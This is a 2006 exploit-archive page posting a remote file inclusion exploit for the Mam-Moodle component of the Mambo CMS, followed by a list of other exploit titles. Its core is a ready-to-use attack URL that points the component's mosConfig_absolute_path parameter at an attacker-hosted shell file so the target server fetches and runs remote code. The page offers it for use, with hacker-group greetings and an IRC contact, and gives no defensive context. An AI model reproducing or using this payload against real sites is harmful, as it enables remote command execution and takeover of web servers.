exploits , vulnerabilities , articles , Mam-Moodle Mambo Component alpha Remote Inclusion Vulnerability

2006-07-23

Mam-Moodle Mambo Component alpha Remote Inclusion Vulnerability

Rated as : High Risk

####################################################################################
#Mam - Moodle Remote File Include
------------------------------------------------------------------------------------
#Bug Found by: jank0
#greetz: hackbsd crew
#risk: dangerous
##this bug allows a remote atacker to execute commands via rfi

path: ?mosConfig_absolute_path=

xpl:
http://web/components/com_moodle/moodle.php?mosConfig_absolute_path=http://shell.txt

Contact: irc.undernet.org #hackbsd
securitydot.net - 2006-07-23

Exploits - newest 10 RSS | More

2007-06-15 57105 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 34093 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 42248 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29259 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19691 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16641 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19344 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16523 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33524 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17167 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit